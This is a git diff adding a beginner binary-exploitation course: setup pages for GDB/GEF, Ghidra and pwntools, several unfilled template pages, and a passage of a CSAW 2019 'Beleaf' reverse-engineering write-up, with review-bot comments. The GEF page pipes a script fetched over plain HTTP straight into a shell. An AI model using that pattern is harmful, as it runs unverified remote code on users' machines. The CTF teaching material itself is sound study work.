diff --git a/0.png b/0.png
new file mode 100644
index 0000000..fe66357
Binary files /dev/null and b/0.png differ
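Review bot: `0.png` lands at the repository root while every other screenshot in this commit lives under a chapter directory (`0/1.png` through `0/11.png`, `1/1.png` through `1/7.png`); check whether this was meant to be `0/0.png`, otherwise it sits orphaned next to the numbered directories and nothing in `0/0.md` can reference it by a consistent relative path.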
diff --git a/0/0.md b/0/0.md
new file mode 100644
index 0000000..3158083
--- /dev/null
+++ b/0/0.md
@@ -0,0 +1,38 @@
+# Binary Exploitation
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
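Review bot: `0/0.md` is committed as an unfilled template: four identical `## Title` / `text` sections, each closed by a stray backtick followed by an empty image embed `` ` ![]() ``. None of the eleven screenshots added under `0/` in this commit is referenced anywhere, so each empty embed renders as nothing and the page is blank apart from the headings. Either fill in the embeds with a real path and alt text (`![description](1.png)`) and drop the leading backtick, or leave the placeholder sections out until they have content.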
diff --git a/0/1.png b/0/1.png
new file mode 100644
index 0000000..7e693b3
Binary files /dev/null and b/0/1.png differ
diff --git a/0/10.png b/0/10.png
new file mode 100644
index 0000000..6bb5f38
Binary files /dev/null and b/0/10.png differ
diff --git a/0/11.png b/0/11.png
new file mode 100644
index 0000000..dd0fa2e
Binary files /dev/null and b/0/11.png differ
diff --git a/0/2.png b/0/2.png
new file mode 100644
index 0000000..b04955d
Binary files /dev/null and b/0/2.png differ
diff --git a/0/3.png b/0/3.png
new file mode 100644
index 0000000..b31caa5
Binary files /dev/null and b/0/3.png differ
diff --git a/0/4.png b/0/4.png
new file mode 100644
index 0000000..8e89d9d
Binary files /dev/null and b/0/4.png differ
diff --git a/0/5.png b/0/5.png
new file mode 100644
index 0000000..aab18e1
Binary files /dev/null and b/0/5.png differ
diff --git a/0/6.png b/0/6.png
new file mode 100644
index 0000000..a10dad8
Binary files /dev/null and b/0/6.png differ
diff --git a/0/7.png b/0/7.png
new file mode 100644
index 0000000..f9b358a
Binary files /dev/null and b/0/7.png differ
diff --git a/0/8.png b/0/8.png
new file mode 100644
index 0000000..3cd79fc
Binary files /dev/null and b/0/8.png differ
diff --git a/0/9.png b/0/9.png
new file mode 100644
index 0000000..2086c21
Binary files /dev/null and b/0/9.png differ
diff --git a/0/gdb.md b/0/gdb.md
new file mode 100644
index 0000000..4e1ac8b
--- /dev/null
+++ b/0/gdb.md
@@ -0,0 +1,140 @@
+# GDB + GEF
+
+GDB, the GNU project debugger, allows you to see what is going on inside another program while it executes, or what said program was doing at the moment it crashed. GDB supports Ada, Assembly, C, C++, D, Frotan, Go, Objective-C, OpenCL, Modula-2, Pascal and Rust. For more information, click [here](https://www.gnu.org/software/gdb/).
+
+However, GDB is very old school, so we will use GEF to enhance the usage of gdb, it is a set of commands for x86/64, ARM, MIPS,PowerPC and SPARC that provides additional features to GDB using the Python API to assist during the dynamic analysis and exploit development. For more information, click [here](https://github.com/hugsy/gef).
+
+## Installation
+
+To install gdb you can find it in most repositories of popular linux distributions:
+
+
+ #Arch Linux:
+ [ 192.168.0.18/24 ] [ /dev/pts/15 ] [~]
+ → pacman -Ss gdb
+ extra/gdb 10.1-4
+ The GNU Debugger
+
+ [ 192.168.0.18/24 ] [ /dev/pts/15 ] [~]
+ → pacman -S gdb
+
+
+ #Kali / Debian:
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → apt search gdb
+ gdb/kali-rolling,now 10.1-1.7 amd64 [installed]
+ GNU Debugger
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → apt install gdb -y
+
+
+To install GEF we will follow the instructions from the main website:
+
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → sh -c "$(wget http://gef.blah.cat/sh -O -)"
+ --2021-02-21 16:20:00-- http://gef.blah.cat/sh
+ Resolving gef.blah.cat (gef.blah.cat)... 40.121.232.30
+ Connecting to gef.blah.cat (gef.blah.cat)|40.121.232.30|:80... connected.
+ HTTP request sent, awaiting response... 301 Moved Permanently
+ Location: https://github.com/hugsy/gef/raw/master/scripts/gef.sh [following]
+ --2021-02-21 16:20:01-- https://github.com/hugsy/gef/raw/master/scripts/gef.sh
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/hugsy/gef/master/scripts/gef.sh [following]
+ --2021-02-21 16:20:01-- https://raw.githubusercontent.com/hugsy/gef/master/scripts/gef.sh
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 565 [text/plain]
+ Saving to: ‘STDOUT’
+
+ - 100%[=================================================================================================================================================================>] 565 --.-KB/s in 0s
+
+ 2021-02-21 16:20:01 (49.8 MB/s) - written to stdout [565/565]
+
+ sh: 6: test: unexpected operator
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → ls -lash ~/.gdbinit
+ 4.0K -rw-r--r-- 1 nothing nothing 58 Feb 21 16:20 /home/nothing/.gdbinit
+
+
+
+Now when you try to launch gdb, you see that you are correctly launching gef:
+
+
+
+If you get any errors as you launch gdb - gef for the first time, just run the required pip install commands:
+
+
+
+
+ gef➤ q
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → sudo apt install python3-pip -y
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → pip3 install keystone-engine unicorn ropper
+ Collecting keystone-engine
+ Downloading keystone_engine-0.9.2-py2.py3-none-manylinux1_x86_64.whl (1.8 MB)
+ |████████████████████████████████| 1.8 MB 2.3 MB/s
+ Collecting unicorn
+ Downloading unicorn-1.0.2-py2.py3-none-manylinux1_x86_64.whl (8.1 MB)
+ |████████████████████████████████| 8.1 MB 6.3 MB/s
+ Collecting ropper
+ Downloading ropper-1.13.6.tar.gz (71 kB)
+ |████████████████████████████████| 71 kB 2.2 MB/s
+ Collecting filebytes>=0.10.0
+ Downloading filebytes-0.10.2.tar.gz (20 kB)
+ Building wheels for collected packages: ropper, filebytes
+ Building wheel for ropper (setup.py) ... done
+ Created wheel for ropper: filename=ropper-1.13.6-py3-none-any.whl size=99735 sha256=2f90a4e8a5b14f1c8c3abd0700b1e56ff8dbc7f3d165a5f69790c31cedd8948b
+ Stored in directory: /home/nothing/.cache/pip/wheels/77/a4/5d/a4bc1b653bdcce30a17b5cdda8f19da11444bb8640d03ab678
+ Building wheel for filebytes (setup.py) ... done
+ Created wheel for filebytes: filename=filebytes-0.10.2-py3-none-any.whl size=27853 sha256=17cf4812a6b16ee7c92a4ba259326c61fbfab4cf3c05ace2cb627a0de892d27f
+ Stored in directory: /home/nothing/.cache/pip/wheels/c2/51/58/98925d75705ee4df10da42a098d956183bb70661698fd07753
+ Successfully built ropper filebytes
+ Installing collected packages: keystone-engine, unicorn, filebytes, ropper
+ WARNING: The script ropper is installed in '/home/nothing/.local/bin' which is not on PATH.
+ Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
+ Successfully installed filebytes-0.10.2 keystone-engine-0.9.2 ropper-1.13.6 unicorn-1.0.2
+
+
+
+
+Once you're here, you're good to go
+
+
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
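Review bot: the GEF install step `sh -c "$(wget http://gef.blah.cat/sh -O -)"` fetches an installer over plain HTTP and pipes it straight into a shell, and the captured output then ends in `sh: 6: test: unexpected operator`, which is left unexplained. That error is `sh` (dash on Kali/Debian) rejecting a bash-only construct in the script; `~/.gdbinit` was still written (58 bytes in the `ls -lash` line), so the install succeeded, but the text should say so and, better, document downloading the script over `https://` to a file, reading it, and running it with `bash`, since readers are being taught to trust what they run under a debugger. Smaller points in the same hunk: "Frotan" should be "Fortran"; "MIPS,PowerPC" needs a space; "we will use GEF to enhance the usage of gdb, it is a set of commands" is a comma splice; the blank gaps after "you see that you are correctly launching gef:" and "just run the required pip install commands:" are where screenshots belong but no `![](...)` embed is present; the `pip3` output warns that `~/.local/bin` is not on `PATH`, which deserves a sentence since `ropper` will otherwise not be found; and the three `## Title` / `text` placeholder sections at the end should not ship.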
diff --git a/0/ghidra.md b/0/ghidra.md
new file mode 100644
index 0000000..7185970
--- /dev/null
+++ b/0/ghidra.md
@@ -0,0 +1,164 @@
+# Ghidra
+
+Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured, high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows, macOS, and Linux. Capabilities include disassembly, assembly, decompilation, graphing, and scripting, along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes.
+
+## Installation
+
+To install Ghidra, we will follow the instructions listed [here](https://www.ghidra-sre.org/InstallationGuide.html)
+
+First install java:
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → sudo apt update -y ; sudo apt upgrade -y ; sudo apt install default-jdk -y
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~]
+ → java -version
+ openjdk version "11.0.10" 2021-01-19
+ OpenJDK Runtime Environment (build 11.0.10+9-post-Debian-1)
+ OpenJDK 64-Bit Server VM (build 11.0.10+9-post-Debian-1, mixed mode, sharing)
+
+
+
+From here, just go to ghidra's main website to download the zip file:
+
+
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/Tools/ghidra]
+ → wget https://www.ghidra-sre.org/ghidra_9.2.2_PUBLIC_20201229.zip
+ --2021-02-21 23:10:29-- https://www.ghidra-sre.org/ghidra_9.2.2_PUBLIC_20201229.zip
+ Resolving www.ghidra-sre.org (www.ghidra-sre.org)... 13.249.9.44, 13.249.9.83, 13.249.9.20, ...
+ Connecting to www.ghidra-sre.org (www.ghidra-sre.org)|13.249.9.44|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 317805407 (303M) [application/zip]
+ Saving to: ‘ghidra_9.2.2_PUBLIC_20201229.zip’
+
+ ghidra_9.2.2_PUBLIC_20201229.zip 100%[=======================================================================================================================================================================================================>] 303.08M 10.9MB/s in 29s
+
+ 2021-02-21 23:10:58 (10.5 MB/s) - ‘ghidra_9.2.2_PUBLIC_20201229.zip’ saved [317805407/317805407]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/Tools/ghidra]
+ → unzip ghidra_9.2.2_PUBLIC_20201229.zip
+
+
+Now from here, we need the ghidraRun binary to launch ghidra:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/Tools/ghidra]
+ → ls -l
+ total 310368
+ drwxr-xr-x 9 nothing nothing 4096 Dec 29 17:22 ghidra_9.2.2_PUBLIC
+ -rw-r--r-- 1 nothing nothing 317805407 Jan 19 17:53 ghidra_9.2.2_PUBLIC_20201229.zip
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/Tools/ghidra]
+ → cd ghidra_9.2.2_PUBLIC
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → ls
+ docs Extensions Ghidra ghidraRun ghidraRun.bat GPL LICENSE licenses server support
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → file ghidraRun
+ ghidraRun: Bourne-Again shell script, ASCII text executable
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → cat ghidraRun
+ #!/usr/bin/env bash
+
+ #----------------------------------------
+ # Ghidra launch
+ #----------------------------------------
+
+ # Maximum heap memory may be changed if default is inadequate. This will generally be up to 1/4 of
+ # the physical memory available to the OS. Uncomment MAXMEM setting if non-default value is needed.
+ #MAXMEM=2G
+
+ # Resolve symbolic link if present and get the directory this script lives in.
+ # NOTE: "readlink -f" is best but works on Linux only, "readlink" will only work if your PWD
+ # contains the link you are calling (which is the best we can do on macOS), and the "echo" is the
+ # fallback, which doesn't attempt to do anything with links.
+ SCRIPT_FILE="$(readlink -f "$0" 2>/dev/null || readlink "$0" 2>/dev/null || echo "$0")"
+ SCRIPT_DIR="${SCRIPT_FILE%/*}"
+
+ # Launch Ghidra
+ "${SCRIPT_DIR}"/support/launch.sh bg Ghidra "${MAXMEM}" "" ghidra.GhidraRun "$@"
+
+
+To make it more convenient, i make a symlink to a folder in PATH:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → echo $PATH
+ /usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → sudo ln -s $(pwd)/ghidraRun /usr/bin/ghidra
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → ls -lash /usr/bin/ghidra
+ 0 lrwxrwxrwx 1 root root 56 Feb 21 23:19 /usr/bin/ghidra -> /home/nothing/Tools/ghidra/ghidra_9.2.2_PUBLIC/ghidraRun
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [Tools/ghidra/ghidra_9.2.2_PUBLIC]
+ → which ghidra
+ /usr/bin/ghidra
+
+
+
+From here you can just type ghidra in your terminal or in dmenu or rofi or whatever you want, it will open up ghidra for you:
+
+
+
+Here you get a nice tutorial to let you know about ghidra's functionnalities, but you will want to create a new project and giving it a directory location:
+
+
+
+Just to test, we're going to copy a random binary locally and import it
+
+
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/3 ] [~/binexp]
+ → cp /bin/lspci .
+
+ [ 192.168.100.126/24 ] [ /dev/pts/3 ] [~/binexp]
+ → ls -lash lspci
+ 92K -rwxr-xr-x 1 nothing nothing 92K Feb 21 23:27 lspci
+
+
+
+`   
+
+And there you have it! You now have an imported a binary file to disassemble.
+
+ ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
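Review bot: `sudo ln -s $(pwd)/ghidraRun /usr/bin/ghidra` puts a symlink into `/usr/bin`, which belongs to the package manager; the `echo $PATH` line in the same hunk already shows `/usr/local/bin`, the conventional location for administrator-installed tools, so `sudo ln -s "$(pwd)/ghidraRun" /usr/local/bin/ghidra` is the better instruction (quoting `$(pwd)` also keeps paths with spaces intact). The resulting link points into `/home/nothing/Tools/...`, so it breaks as soon as that directory moves; worth a sentence. The 303 MB zip is downloaded and unzipped with no integrity check; add `sha256sum ghidra_9.2.2_PUBLIC_20201229.zip` and compare against the checksum published alongside the download before running `ghidraRun`. Wording: "functionnalities" should be "functionalities", "but you will want to create a new project and giving it a directory location" should read "and give it", "i make a symlink" should be capitalised, and "You now have an imported a binary file to disassemble" has an extra word. The lone backtick line before "And there you have it!", the empty `![]()` after it, and the three `## Title` / `text` placeholder sections at the end are leftover template and should go.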
diff --git a/0/pwntools.md b/0/pwntools.md
new file mode 100644
index 0000000..336544c
--- /dev/null
+++ b/0/pwntools.md
@@ -0,0 +1,86 @@
+# Python Pwntools
+
+Pwntools is a python ctf library designed for rapid exploit development. It helps us write exploits quickly, thanks to the functionnalities behind it. Pwntools has python2 and python3 versions, In this course we will use the python3 version since it is the most up to date.
+
+## Installation
+
+The installation is fairly simple. Make sure you have python3 and python3-pip installed on your system, then run the following:
+
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → which python3 pip3
+ /usr/bin/python3
+ /usr/bin/pip3
+
+
+ [ 10.10.14.17/23 ] [ /dev/pts/3 ] [~]
+ → sudo pip3 install pwn
+ [sudo] password for nothing:
+
+ Collecting pwn
+ Downloading pwn-1.0.tar.gz (1.1 kB)
+ Collecting pwntools
+ Downloading pwntools-4.3.1-py2.py3-none-any.whl (10.0 MB)
+ |████████████████████████████████| 10.0 MB 12.3 MB/s
+ Requirement already satisfied: six>=1.12.0 in /usr/lib/python3/dist-packages (from pwntools->pwn) (1.15.0)
+ Requirement already satisfied: pyserial>=2.7 in /usr/lib/python3/dist-packages (from pwntools->pwn) (3.5b0)
+ Requirement already satisfied: requests>=2.0 in /usr/lib/python3/dist-packages (from pwntools->pwn) (2.25.1)
+ Requirement already satisfied: pygments>=2.0 in /usr/lib/python3/dist-packages (from pwntools->pwn) (2.7.1)
+ Requirement already satisfied: intervaltree>=3.0 in /usr/lib/python3/dist-packages (from pwntools->pwn) (3.0.2)
+ Requirement already satisfied: paramiko>=1.15.2 in /usr/lib/python3/dist-packages (from pwntools->pwn) (2.7.2)
+ Requirement already satisfied: sortedcontainers in /usr/lib/python3/dist-packages (from pwntools->pwn) (2.1.0)
+ Requirement already satisfied: python-dateutil in /usr/lib/python3/dist-packages (from pwntools->pwn) (2.8.1)
+ Requirement already satisfied: packaging in /usr/lib/python3/dist-packages (from pwntools->pwn) (20.8)
+ Requirement already satisfied: pysocks in /usr/lib/python3/dist-packages (from pwntools->pwn) (1.7.1)
+ Collecting unicorn<1.0.2rc4,>=1.0.2rc1
+ Downloading unicorn-1.0.2rc3-py2.py3-none-manylinux1_x86_64.whl (8.1 MB)
+ |████████████████████████████████| 8.1 MB 4.2 MB/s
+ Requirement already satisfied: mako>=1.0.0 in /usr/lib/python3/dist-packages (from pwntools->pwn) (1.1.3)
+ Requirement already satisfied: pip>=6.0.8 in /usr/lib/python3/dist-packages (from pwntools->pwn) (20.1.1)
+ Collecting ropgadget>=5.3
+ Downloading ROPGadget-6.5-py3-none-any.whl (31 kB)
+ Requirement already satisfied: capstone>=3.0.5rc2 in /usr/lib/python3/dist-packages (from pwntools->pwn) (4.0.2)
+ Requirement already satisfied: pyelftools>=0.2.4 in /usr/lib/python3/dist-packages (from pwntools->pwn) (0.27)
+ Requirement already satisfied: psutil>=3.3.0 in /usr/lib/python3/dist-packages (from pwntools->pwn) (5.7.3)
+ Building wheels for collected packages: pwn
+ Building wheel for pwn (setup.py) ... done
+ Created wheel for pwn: filename=pwn-1.0-py3-none-any.whl size=1220 sha256=35c1e3da705801680c0b2d0b440b1da8836bc2b32b4343d4aa751ffcf26abf78
+ Stored in directory: /root/.cache/pip/wheels/34/a6/82/682ac94b58ae2e949908f11392d778574372a6cedc78b4b0a5
+ Successfully built pwn
+ Installing collected packages: unicorn, ropgadget, pwntools, pwn
+ Successfully installed pwn-1.0 pwntools-4.3.1 ropgadget-6.5 unicorn-1.0.2rc3
+
+
+
+If you want the full documentation on pwntools, click [here](https://docs.pwntools.com/en/stable/).
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
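Review bot: `sudo pip3 install pwn` runs pip as root against the system interpreter (the wheel is cached under `/root/.cache`), where it can overwrite the distro-managed packages that the output lists under `/usr/lib/python3/dist-packages`; the instruction should be `pip3 install --user pwntools` or an install inside a virtual environment. Note also that `pwn` is only a 1.1 kB wrapper package that pulls in `pwntools`, as the "Collecting pwn" / "Collecting pwntools" lines show, and `pwntools` is the name the project documents. Wording in the intro: "python ctf library" should be "Python CTF library", "functionnalities" should be "functionalities", and "versions, In this course" needs a full stop. The empty `![]()` after the documentation link and the three `## Title` / `text` placeholder sections should not be committed.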
diff --git a/1/0.md b/1/0.md
new file mode 100644
index 0000000..bd2c701
--- /dev/null
+++ b/1/0.md
@@ -0,0 +1,84 @@
+# Binary Exploitation
+
+## Downloading the binary file
+
+
+
+
+` ![]()
+
+## Solution
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
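Review bot: `1/0.md` has no content: the `## Solution` section is thirty-odd blank lines followed by eleven empty `![]()` embeds, while only seven screenshots (`1/1.png` through `1/7.png`) are added in this commit, so the counts do not even match. The actual write-ups for this chapter are `1/beleaf.md` and `1/heli.md`; either make this file an index that links to them or drop it until the `## Downloading the binary file` and `## Solution` sections are written. The stray backtick before `![]()` and the two trailing `## Title` / `text` placeholders are the same template residue as in the chapter 0 files.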
diff --git a/1/1.png b/1/1.png
new file mode 100644
index 0000000..032bc3e
Binary files /dev/null and b/1/1.png differ
diff --git a/1/2.png b/1/2.png
new file mode 100644
index 0000000..c46127d
Binary files /dev/null and b/1/2.png differ
diff --git a/1/3.png b/1/3.png
new file mode 100644
index 0000000..ee66043
Binary files /dev/null and b/1/3.png differ
diff --git a/1/4.png b/1/4.png
new file mode 100644
index 0000000..63dfeef
Binary files /dev/null and b/1/4.png differ
diff --git a/1/5.png b/1/5.png
new file mode 100644
index 0000000..01d4915
Binary files /dev/null and b/1/5.png differ
diff --git a/1/6.png b/1/6.png
new file mode 100644
index 0000000..4ddd006
Binary files /dev/null and b/1/6.png differ
diff --git a/1/7.png b/1/7.png
new file mode 100644
index 0000000..a471f1a
Binary files /dev/null and b/1/7.png differ
diff --git a/1/beleaf.md b/1/beleaf.md
new file mode 100644
index 0000000..8117448
--- /dev/null
+++ b/1/beleaf.md
@@ -0,0 +1,402 @@
+# CSAW 2019 Beleaf
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/03-beginner_re/csaw19_beleaf/beleaf
+ --2021-02-22 19:55:50-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/03-beginner_re/csaw19_beleaf/beleaf
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/03-beginner_re/csaw19_beleaf/beleaf [following]
+ --2021-02-22 19:55:51-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/03-beginner_re/csaw19_beleaf/beleaf
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.111.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 7624 (7.4K) [application/octet-stream]
+ Saving to: ‘beleaf’
+
+ beleaf 100%[===============================================================================>] 7.45K --.-KB/s in 0.01s
+
+ 2021-02-22 19:55:51 (676 KB/s) - ‘beleaf’ saved [7624/7624]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → file beleaf
+ beleaf: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=6d305eed7c9bebbaa60b67403a6c6f2b36de3ca4, stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → chmod +x beleaf
+
+
+
+` ![]()
+
+## Solution
+
+Now, first things first, we are going to use pwntools' pwn tool to check the security of the binary file itself.
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [~/binexp/1]
+ → pwn checksec beleaf
+ [*] '/home/nothing/binexp/1/beleaf'
+ Arch: amd64-64-little
+ RELRO: Full RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+
+
+
+So we are dealing with a 64bit binary, that scans the input of the user and then checks it, very much like the previous challenge we solved, [helithumper](heli.html). So we're going to import the file into ghidra, and take a look at the main function
+
+
+
+Here the main function is not called 'main' like in the previous challenge, to do so i had to look for the 'Enter the flag >>>" print statement which happened to be in the FUN_001008a1 function as you can see in the screenshot above. The code that ghidra gives us says that our text input is called 'local_98' and then later on the length of our text input is passed into sVar1
+
+
+ undefined8 FUN_001008a1(void)
+
+ {
+ size_t sVar1;
+ long lVar2;
+ long in_FS_OFFSET;
+ ulong local_b0;
+ char local_98 [136];
+ long local_10;
+
+ local_10 = *(long *)(in_FS_OFFSET + 0x28);
+ printf("Enter the flag\n>>> ");
+ __isoc99_scanf(&DAT;_00100a78,local_98);
+ sVar1 = strlen(local_98);
+ if (sVar1 < 0x21) {
+ puts("Incorrect!");
+ /* WARNING: Subroutine does not return */
+ exit(1);
+ }
+ local_b0 = 0;
+ while (local_b0 < sVar1) {
+ lVar2 = FUN_001007fa((int)local_98[local_b0]);
+ if (lVar2 != *(long *)(&DAT;_003014e0 + local_b0 * 8)) {
+ puts("Incorrect!");
+ /* WARNING: Subroutine does not return */
+ exit(1);
+ }
+ local_b0 = local_b0 + 1;
+ }
+ puts("Correct!");
+ if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return 0;
+ }
+
+
+now let's look at what we need to get the 'correct' output, first of all if our input LENGTH (sVar1) is less than 0x21 or 33 bytes, we will get 'incorrect', so we need at least 33 characters:
+
+
+ if (sVar1 < 0x21) {
+ puts("Incorrect!");
+ /* WARNING: Subroutine does not return */
+ exit(1);
+
+
+Then we see that we enter a for loop (which is a while loop with a variable being incremented (here it is local_b0))
+
+
+ while (local_b0 < sVar1) {
+ lVar2 = FUN_001007fa((int)local_98[local_b0]);
+ if (lVar2 != *(long *)(&DAT;_003014e0 + local_b0 * 8)) {
+ puts("Incorrect!");
+ /* WARNING: Subroutine does not return */
+ exit(1);
+ }
+ local_b0 = local_b0 + 1;
+ }
+ puts("Correct!");
+
+
+in this for loop, each character of our text input (local_98 at the index 0,1,2,3 ... 32) gets passed into the 'FUN_001007fa' function the result of that function gets passed to the if statement as 'lVar2' to get checked against a certain '&DAT;_003014e0' which is basically an array, the if statement checks for the characters at offsets of 8. So let's double click it to see what it is:
+
+
+ DAT_003014e0 XREF[2]: FUN_001008a1:0010096b(*),
+ FUN_001008a1:00100972(R)
+ 003014e0 01 ?? 01h
+
+ 003014e1 00 ?? 00h
+ 003014e2 00 ?? 00h
+ 003014e3 00 ?? 00h
+ 003014e4 00 ?? 00h
+ 003014e5 00 ?? 00h
+ 003014e6 00 ?? 00h
+ 003014e7 00 ?? 00h
+ 003014e8 09 ?? 09h
+
+ 003014e9 00 ?? 00h
+ 003014ea 00 ?? 00h
+ 003014eb 00 ?? 00h
+ 003014ec 00 ?? 00h
+ 003014ed 00 ?? 00h
+ 003014ee 00 ?? 00h
+ 003014ef 00 ?? 00h
+ 003014f0 11 ?? 11h
+
+ 003014f1 00 ?? 00h
+ 003014f2 00 ?? 00h
+ 003014f3 00 ?? 00h
+ 003014f4 00 ?? 00h
+ 003014f5 00 ?? 00h
+ 003014f6 00 ?? 00h
+ 003014f7 00 ?? 00h
+ 003014f8 27 ?? 27h '
+
+ 003014f9 00 ?? 00h
+ 003014fa 00 ?? 00h
+ 003014fb 00 ?? 00h
+ 003014fc 00 ?? 00h
+ 003014fd 00 ?? 00h
+ 003014fe 00 ?? 00h
+ 003014ff 00 ?? 00h
+ 00301500 02 ?? 02h
+
+
+
+And here we see the bytes we need are at offsets of 8, so we have the following:
+
+
+ 0x1 0x9 0x11 0x27 0x2
+
+
+Now let's take a look at the 'FUN_001007fa' function that checks each of our input text characters:
+
+
+
+
+ long FUN_001007fa(char param_1)
+
+ {
+ long local_10;
+
+ local_10 = 0;
+ while ((local_10 != -1 && ((int)param_1 != *(int *)(&DAT;_00301020 + local_10 * 4)))) {
+ if ((int)param_1 < *(int *)(&DAT;_00301020 + local_10 * 4)) {
+ local_10 = local_10 * 2 + 1;
+ }
+ else {
+ if (*(int *)(&DAT;_00301020 + local_10 * 4) < (int)param_1) {
+ local_10 = (local_10 + 1) * 2;
+ }
+ }
+ }
+ return local_10;
+ }
+
+
+in here, each character of our input text gets passed as the param_1 charcater, and then the function basically looks at the 'DAT_003014e0' array with offsets of 4, the function tries to find at which index our input text characters are in this array, so let's see what is in that 'DAT_003014e0' array
+
+
+ DAT_00301020 XREF[6]: FUN_001007fa:00100820(*),
+ FUN_001007fa:00100827(R),
+ FUN_001007fa:00100844(*),
+ FUN_001007fa:0010084b(R),
+ FUN_001007fa:00100873(*),
+ FUN_001007fa:0010087a(R)
+ 00301020 77 ?? 77h w
+
+ 00301021 00 ?? 00h
+ 00301022 00 ?? 00h
+ 00301023 00 ?? 00h
+ 00301024 66 ?? 66h f
+
+ 00301025 00 ?? 00h
+ 00301026 00 ?? 00h
+ 00301027 00 ?? 00h
+ 00301028 7b ?? 7Bh {
+
+ 00301029 00 ?? 00h
+ 0030102a 00 ?? 00h
+ 0030102b 00 ?? 00h
+ 0030102c 5f ?? 5Fh _
+
+ 0030102d 00 ?? 00h
+ 0030102e 00 ?? 00h
+ 0030102f 00 ?? 00h
+ 00301030 6e ?? 6Eh n
+
+ 00301031 00 ?? 00h
+ 00301032 00 ?? 00h
+ 00301033 00 ?? 00h
+ 00301034 79 ?? 79h y
+
+ 00301035 00 ?? 00h
+ 00301036 00 ?? 00h
+ 00301037 00 ?? 00h
+ 00301038 7d ?? 7Dh }
+
+ 00301039 00 ?? 00h
